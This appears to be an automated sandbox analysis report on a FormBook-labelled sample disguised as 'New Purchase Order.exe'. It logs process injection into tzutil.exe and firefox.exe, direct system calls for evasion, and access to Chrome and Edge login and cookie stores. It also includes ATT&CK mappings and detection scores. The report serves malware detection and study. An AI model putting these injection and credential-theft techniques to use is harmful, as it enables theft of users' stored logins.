                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018D62A0 mov eax, dword ptr fs:[00000030h]3_2_018D62A0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018D62A0 mov ecx, dword ptr fs:[00000030h]3_2_018D62A0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018D62A0 mov eax, dword ptr fs:[00000030h]3_2_018D62A0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018D62A0 mov eax, dword ptr fs:[00000030h]3_2_018D62A0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018D62A0 mov eax, dword ptr fs:[00000030h]3_2_018D62A0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018D62A0 mov eax, dword ptr fs:[00000030h]3_2_018D62A0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0184A2C3 mov eax, dword ptr fs:[00000030h]3_2_0184A2C3
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0184A2C3 mov eax, dword ptr fs:[00000030h]3_2_0184A2C3
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0184A2C3 mov eax, dword ptr fs:[00000030h]3_2_0184A2C3
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0184A2C3 mov eax, dword ptr fs:[00000030h]3_2_0184A2C3
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0184A2C3 mov eax, dword ptr fs:[00000030h]3_2_0184A2C3
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018502E1 mov eax, dword ptr fs:[00000030h]3_2_018502E1
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018502E1 mov eax, dword ptr fs:[00000030h]3_2_018502E1
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018502E1 mov eax, dword ptr fs:[00000030h]3_2_018502E1
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0183823B mov eax, dword ptr fs:[00000030h]3_2_0183823B
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018C8243 mov eax, dword ptr fs:[00000030h]3_2_018C8243
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018C8243 mov ecx, dword ptr fs:[00000030h]3_2_018C8243
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0183A250 mov eax, dword ptr fs:[00000030h]3_2_0183A250
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01846259 mov eax, dword ptr fs:[00000030h]3_2_01846259
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018FA250 mov eax, dword ptr fs:[00000030h]3_2_018FA250
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018FA250 mov eax, dword ptr fs:[00000030h]3_2_018FA250
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01844260 mov eax, dword ptr fs:[00000030h]3_2_01844260
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01844260 mov eax, dword ptr fs:[00000030h]3_2_01844260
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01844260 mov eax, dword ptr fs:[00000030h]3_2_01844260
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0183826B mov eax, dword ptr fs:[00000030h]3_2_0183826B
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018F0274 mov eax, dword ptr fs:[00000030h]3_2_018F0274
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018F0274 mov eax, dword ptr fs:[00000030h]3_2_018F0274
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018F0274 mov eax, dword ptr fs:[00000030h]3_2_018F0274
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018F0274 mov eax, dword ptr fs:[00000030h]3_2_018F0274
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018F0274 mov eax, dword ptr fs:[00000030h]3_2_018F0274
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018F0274 mov eax, dword ptr fs:[00000030h]3_2_018F0274
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018F0274 mov eax, dword ptr fs:[00000030h]3_2_018F0274
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018F0274 mov eax, dword ptr fs:[00000030h]3_2_018F0274
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018F0274 mov eax, dword ptr fs:[00000030h]3_2_018F0274
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018F0274 mov eax, dword ptr fs:[00000030h]3_2_018F0274
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018F0274 mov eax, dword ptr fs:[00000030h]3_2_018F0274
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018F0274 mov eax, dword ptr fs:[00000030h]3_2_018F0274
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01842582 mov eax, dword ptr fs:[00000030h]3_2_01842582
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01842582 mov ecx, dword ptr fs:[00000030h]3_2_01842582
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01874588 mov eax, dword ptr fs:[00000030h]3_2_01874588
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0187E59C mov eax, dword ptr fs:[00000030h]3_2_0187E59C
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018C05A7 mov eax, dword ptr fs:[00000030h]3_2_018C05A7
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018C05A7 mov eax, dword ptr fs:[00000030h]3_2_018C05A7
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018C05A7 mov eax, dword ptr fs:[00000030h]3_2_018C05A7
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018645B1 mov eax, dword ptr fs:[00000030h]3_2_018645B1
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018645B1 mov eax, dword ptr fs:[00000030h]3_2_018645B1
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0187E5CF mov eax, dword ptr fs:[00000030h]3_2_0187E5CF
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0187E5CF mov eax, dword ptr fs:[00000030h]3_2_0187E5CF
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018465D0 mov eax, dword ptr fs:[00000030h]3_2_018465D0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0187A5D0 mov eax, dword ptr fs:[00000030h]3_2_0187A5D0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0187A5D0 mov eax, dword ptr fs:[00000030h]3_2_0187A5D0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0186E5E7 mov eax, dword ptr fs:[00000030h]3_2_0186E5E7
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0186E5E7 mov eax, dword ptr fs:[00000030h]3_2_0186E5E7
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0186E5E7 mov eax, dword ptr fs:[00000030h]3_2_0186E5E7
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0186E5E7 mov eax, dword ptr fs:[00000030h]3_2_0186E5E7
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0186E5E7 mov eax, dword ptr fs:[00000030h]3_2_0186E5E7
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0186E5E7 mov eax, dword ptr fs:[00000030h]3_2_0186E5E7
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0186E5E7 mov eax, dword ptr fs:[00000030h]3_2_0186E5E7
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0186E5E7 mov eax, dword ptr fs:[00000030h]3_2_0186E5E7
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018425E0 mov eax, dword ptr fs:[00000030h]3_2_018425E0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0187C5ED mov eax, dword ptr fs:[00000030h]3_2_0187C5ED
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0187C5ED mov eax, dword ptr fs:[00000030h]3_2_0187C5ED
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018D6500 mov eax, dword ptr fs:[00000030h]3_2_018D6500
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01914500 mov eax, dword ptr fs:[00000030h]3_2_01914500
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01914500 mov eax, dword ptr fs:[00000030h]3_2_01914500
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01914500 mov eax, dword ptr fs:[00000030h]3_2_01914500
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01914500 mov eax, dword ptr fs:[00000030h]3_2_01914500
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01914500 mov eax, dword ptr fs:[00000030h]3_2_01914500
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01914500 mov eax, dword ptr fs:[00000030h]3_2_01914500
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01914500 mov eax, dword ptr fs:[00000030h]3_2_01914500
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01850535 mov eax, dword ptr fs:[00000030h]3_2_01850535
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01850535 mov eax, dword ptr fs:[00000030h]3_2_01850535
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01850535 mov eax, dword ptr fs:[00000030h]3_2_01850535
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01850535 mov eax, dword ptr fs:[00000030h]3_2_01850535
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01850535 mov eax, dword ptr fs:[00000030h]3_2_01850535
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01850535 mov eax, dword ptr fs:[00000030h]3_2_01850535
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0186E53E mov eax, dword ptr fs:[00000030h]3_2_0186E53E
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0186E53E mov eax, dword ptr fs:[00000030h]3_2_0186E53E
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0186E53E mov eax, dword ptr fs:[00000030h]3_2_0186E53E
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0186E53E mov eax, dword ptr fs:[00000030h]3_2_0186E53E
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0186E53E mov eax, dword ptr fs:[00000030h]3_2_0186E53E
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01848550 mov eax, dword ptr fs:[00000030h]3_2_01848550
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01848550 mov eax, dword ptr fs:[00000030h]3_2_01848550
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0187656A mov eax, dword ptr fs:[00000030h]3_2_0187656A
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0187656A mov eax, dword ptr fs:[00000030h]3_2_0187656A
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0187656A mov eax, dword ptr fs:[00000030h]3_2_0187656A
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018FA49A mov eax, dword ptr fs:[00000030h]3_2_018FA49A
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018464AB mov eax, dword ptr fs:[00000030h]3_2_018464AB
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018744B0 mov ecx, dword ptr fs:[00000030h]3_2_018744B0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018CA4B0 mov eax, dword ptr fs:[00000030h]3_2_018CA4B0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018404E5 mov ecx, dword ptr fs:[00000030h]3_2_018404E5
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01878402 mov eax, dword ptr fs:[00000030h]3_2_01878402
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01878402 mov eax, dword ptr fs:[00000030h]3_2_01878402
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01878402 mov eax, dword ptr fs:[00000030h]3_2_01878402
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0183E420 mov eax, dword ptr fs:[00000030h]3_2_0183E420
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0183E420 mov eax, dword ptr fs:[00000030h]3_2_0183E420
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0183E420 mov eax, dword ptr fs:[00000030h]3_2_0183E420
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0183C427 mov eax, dword ptr fs:[00000030h]3_2_0183C427
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018C6420 mov eax, dword ptr fs:[00000030h]3_2_018C6420
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018C6420 mov eax, dword ptr fs:[00000030h]3_2_018C6420
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018C6420 mov eax, dword ptr fs:[00000030h]3_2_018C6420
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018C6420 mov eax, dword ptr fs:[00000030h]3_2_018C6420
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018C6420 mov eax, dword ptr fs:[00000030h]3_2_018C6420
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018C6420 mov eax, dword ptr fs:[00000030h]3_2_018C6420
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018C6420 mov eax, dword ptr fs:[00000030h]3_2_018C6420
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0187A430 mov eax, dword ptr fs:[00000030h]3_2_0187A430
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0187E443 mov eax, dword ptr fs:[00000030h]3_2_0187E443
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0187E443 mov eax, dword ptr fs:[00000030h]3_2_0187E443
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0187E443 mov eax, dword ptr fs:[00000030h]3_2_0187E443
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0187E443 mov eax, dword ptr fs:[00000030h]3_2_0187E443
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0187E443 mov eax, dword ptr fs:[00000030h]3_2_0187E443
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0187E443 mov eax, dword ptr fs:[00000030h]3_2_0187E443
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0187E443 mov eax, dword ptr fs:[00000030h]3_2_0187E443
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0187E443 mov eax, dword ptr fs:[00000030h]3_2_0187E443
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018FA456 mov eax, dword ptr fs:[00000030h]3_2_018FA456
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0186245A mov eax, dword ptr fs:[00000030h]3_2_0186245A
                Source: C:\Users\user\Desktop\New Purchase Order.exe Memory allocated: page read and write | page guard

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Program Files (x86)\VNQzzGlLwqmwByFEhHBilcHxFXuLpliuHHUTVRKDPiBIVJ\snpURZzZKgO.exe
                  NtProtectVirtualMemory: Direct from: 0x77542F9C
                  NtSetInformationProcess: Direct from: 0x77542C5C
                  NtOpenKeyEx: Direct from: 0x77542B9C
                  NtProtectVirtualMemory: Direct from: 0x77537B2E
                  NtCreateFile: Direct from: 0x77542FEC
                  NtOpenFile: Direct from: 0x77542DCC
                  NtQueryInformationToken: Direct from: 0x77542CAC
                  NtTerminateThread: Direct from: 0x77542FCC
                  NtDeviceIoControlFile: Direct from: 0x77542AEC
                  NtAllocateVirtualMemory: Direct from: 0x77542BEC
                  NtQueryVolumeInformationFile: Direct from: 0x77542F2C
                  NtOpenSection: Direct from: 0x77542E0C
                  NtAllocateVirtualMemory: Direct from: 0x775448EC
                  NtSetInformationThread: Direct from: 0x775363F9
                  NtQuerySystemInformation: Direct from: 0x775448CC
                  NtClose: Direct from: 0x77542B6C
                  NtReadVirtualMemory: Direct from: 0x77542E8C
                  NtCreateKey: Direct from: 0x77542C6C
                  NtSetInformationThread: Direct from: 0x77542B4C
                  NtQueryAttributesFile: Direct from: 0x77542E6C
                  NtAllocateVirtualMemory: Direct from: 0x77543C9C
                  NtCreateUserProcess: Direct from: 0x7754371C
                  NtQueryInformationProcess: Direct from: 0x77542C26
                  NtResumeThread: Direct from: 0x77542FBC
                  NtWriteVirtualMemory: Direct from: 0x7754490C
                  NtDelayExecution: Direct from: 0x77542DDC
                  NtAllocateVirtualMemory: Direct from: 0x77542BFC
                  NtReadFile: Direct from: 0x77542ADC
                  NtQuerySystemInformation: Direct from: 0x77542DFC
                  NtResumeThread: Direct from: 0x775436AC
                  NtNotifyChangeKey: Direct from: 0x77543C2C
                  NtCreateMutant: Direct from: 0x775435CC
                  NtWriteVirtualMemory: Direct from: 0x77542E3C
                  NtMapViewOfSection: Direct from: 0x77542D1C
                Source: C:\Users\user\Desktop\New Purchase Order.exe; Section loaded: NULL target: C:\Program Files (x86)\VNQzzGlLwqmwByFEhHBilcHxFXuLpliuHHUTVRKDPiBIVJ\snpURZzZKgO.exe protection: execute and read and write
                Source: C:\Users\user\Desktop\New Purchase Order.exe; Section loaded: NULL target: C:\Windows\SysWOW64\tzutil.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\tzutil.exe; Section loaded: NULL target: C:\Program Files (x86)\VNQzzGlLwqmwByFEhHBilcHxFXuLpliuHHUTVRKDPiBIVJ\snpURZzZKgO.exe protection: read write
                Source: C:\Windows\SysWOW64\tzutil.exe; Section loaded: NULL target: C:\Program Files (x86)\VNQzzGlLwqmwByFEhHBilcHxFXuLpliuHHUTVRKDPiBIVJ\snpURZzZKgO.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\tzutil.exe; Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
                Source: C:\Windows\SysWOW64\tzutil.exe; Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\tzutil.exe; Thread register set: target process: 1184
                Source: C:\Windows\SysWOW64\tzutil.exe; Thread APC queued: target process: C:\Program Files (x86)\VNQzzGlLwqmwByFEhHBilcHxFXuLpliuHHUTVRKDPiBIVJ\snpURZzZKgO.exe
                Source: C:\Users\user\Desktop\New Purchase Order.exe; Process created: C:\Users\user\Desktop\New Purchase Order.exe "C:\Users\user\Desktop\New Purchase Order.exe"
                Source: C:\Program Files (x86)\VNQzzGlLwqmwByFEhHBilcHxFXuLpliuHHUTVRKDPiBIVJ\snpURZzZKgO.exe; Process created: C:\Windows\SysWOW64\tzutil.exe "C:\Windows\SysWOW64\tzutil.exe"
                Source: C:\Windows\SysWOW64\tzutil.exe; Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: snpURZzZKgO.exe, 00000005.00000000.1849626686.0000000001371000.00000002.00000001.00040000.00000000.sdmp, snpURZzZKgO.exe, 00000005.00000002.2611278747.0000000001371000.00000002.00000001.00040000.00000000.sdmp, snpURZzZKgO.exe, 00000009.00000002.2612237374.0000000000C91000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: Program Manager
                Source: snpURZzZKgO.exe, 00000005.00000000.1849626686.0000000001371000.00000002.00000001.00040000.00000000.sdmp, snpURZzZKgO.exe, 00000005.00000002.2611278747.0000000001371000.00000002.00000001.00040000.00000000.sdmp, snpURZzZKgO.exe, 00000009.00000002.2612237374.0000000000C91000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: Shell_TrayWnd
                Source: snpURZzZKgO.exe, 00000005.00000000.1849626686.0000000001371000.00000002.00000001.00040000.00000000.sdmp, snpURZzZKgO.exe, 00000005.00000002.2611278747.0000000001371000.00000002.00000001.00040000.00000000.sdmp, snpURZzZKgO.exe, 00000009.00000002.2612237374.0000000000C91000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: Progman
                Source: snpURZzZKgO.exe, 00000005.00000000.1849626686.0000000001371000.00000002.00000001.00040000.00000000.sdmp, snpURZzZKgO.exe, 00000005.00000002.2611278747.0000000001371000.00000002.00000001.00040000.00000000.sdmp, snpURZzZKgO.exe, 00000009.00000002.2612237374.0000000000C91000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\New Purchase Order.exe; Queries volume information: C:\Users\user\Desktop\New Purchase Order.exe VolumeInformation
                Source: C:\Users\user\Desktop\New Purchase Order.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\user\Desktop\New Purchase Order.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Users\user\Desktop\New Purchase Order.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Source: C:\Users\user\Desktop\New Purchase Order.exe; Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                Source: C:\Users\user\Desktop\New Purchase Order.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Users\user\Desktop\New Purchase Order.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                Stealing of Sensitive Information

                Source: Yara match; File source: 3.2.New Purchase Order.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match; File source: 3.2.New Purchase Order.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match; File source: 00000009.00000002.2611954893.0000000000800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000008.00000002.2614825871.00000000029E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000003.00000002.1939529560.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000008.00000002.2610067851.00000000001C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000003.00000002.1945000489.0000000001B60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000008.00000002.2610575297.0000000002680000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000003.00000002.1946849090.00000000026C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000005.00000002.2611853715.0000000003450000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\SysWOW64\tzutil.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
                Source: C:\Windows\SysWOW64\tzutil.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\tzutil.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\tzutil.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
                Source: C:\Windows\SysWOW64\tzutil.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\tzutil.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Windows\SysWOW64\tzutil.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\tzutil.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                Source: C:\Windows\SysWOW64\tzutil.exe; Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

                Remote Access Functionality

                Source: Yara match; File source: 3.2.New Purchase Order.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match; File source: 3.2.New Purchase Order.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match; File source: 00000009.00000002.2611954893.0000000000800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000008.00000002.2614825871.00000000029E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000003.00000002.1939529560.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000008.00000002.2610067851.00000000001C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000003.00000002.1945000489.0000000001B60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000008.00000002.2610575297.0000000002680000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000003.00000002.1946849090.00000000026C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000005.00000002.2611853715.0000000003450000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                | Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
                |---|---|---|---|---|---|---|---|---|---|---|---|---|---|
                | Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Windows Management Instrumentation | 1 DLL Side-Loading | 312 Process Injection | 1 Masquerading | 1 OS Credential Dumping | 121 Security Software Discovery | Remote Services | 1 Email Collection | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
                | Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 Abuse Elevation Control Mechanism | 1 Disable or Modify Tools | LSASS Memory | 2 Process Discovery | Remote Desktop Protocol | 1 Archive Collected Data | 3 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service |
                | Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 DLL Side-Loading | 41 Virtualization/Sandbox Evasion | Security Account Manager | 41 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | 1 Data from Local System | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
                | Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 312 Process Injection | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 4 Application Layer Protocol | Traffic Duplication | Data Destruction |
                | Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 2 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
                | Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Abuse Elevation Control Mechanism | Cached Domain Credentials | 113 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
                | DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 4 Obfuscated Files or Information | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
                | Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 12 Software Packing | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |
                | Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 DLL Side-Loading | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement |
                [Behavior graph] Behavior Graph ID: 1567394, Sample: New Purchase Order.exe, Startdate: 03/12/2024, Architecture: WINDOWS, Score: 100
                Process chain shown in the graph: New Purchase Order.exe (started) -> New Purchase Order.exe (started) -> snpURZzZKgO.exe (injected) -> tzutil.exe (started) -> snpURZzZKgO.exe (injected) and firefox.exe (started)

                | Source | Detection | Scanner | Label |
                |---|---|---|---|
                | New Purchase Order.exe | 42% | ReversingLabs | Win32.Backdoor.FormBook |
                | New Purchase Order.exe | 100% | Joe Sandbox ML | |
